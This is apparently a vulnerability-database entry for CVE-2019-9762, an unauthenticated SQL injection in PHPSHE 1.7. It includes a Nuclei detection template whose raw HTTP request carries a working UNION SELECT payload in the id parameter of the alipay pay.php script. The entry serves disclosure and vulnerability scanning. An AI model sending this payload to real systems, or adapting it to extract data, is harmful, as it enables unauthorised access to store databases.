CVE-2019-9762: PHPSHE 1.7 - SQL Injection

日期: 2025-08-01 | 影响软件: PHPSHE 1.7 | POC: 已公开

漏洞描述

A SQL Injection was discovered in PHPSHE 1.7 in include/plugin/payment/alipay/pay.php with the parameter id. The vulnerability does not need any authentication.

PoC代码[已公开]

id: CVE-2019-9762

info:
  name: PHPSHE 1.7 -  SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A SQL Injection was discovered in PHPSHE 1.7 in include/plugin/payment/alipay/pay.php with the parameter id. The vulnerability does not need any authentication.
  reference:
    - https://gitee.com/koyshe/phpshe/issues/ITC0C
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9762
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-9762
    cwe-id: CWE-89
    epss-score: 0.51435
    epss-percentile: 0.97814
    cpe: cpe:2.3:a:phpshe:phpshe:1.7:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpshe
    product: phpshe
    fofa-query: app="PHPSHE"
  tags: cve,cve2019,phpshe,sqli

variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /include/plugin/payment/alipay/pay.php?id=pay%20where%201=1%20union%20select%201,2,CONCAT(md5({{num}})),4,5,6,7,8,9,10,11,12%23_ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'
# digest: 4a0a004730450220244714f1adfea03451c8c098f7f3c2f734dbce7d754bb076dd45d1b270462e4e022100e8bf3e8e16570505dfb8fa2f85d893c2ec391179929fb06989030fd83c2feada:922c64590222798bb761d5b6d8e72950

相关漏洞推荐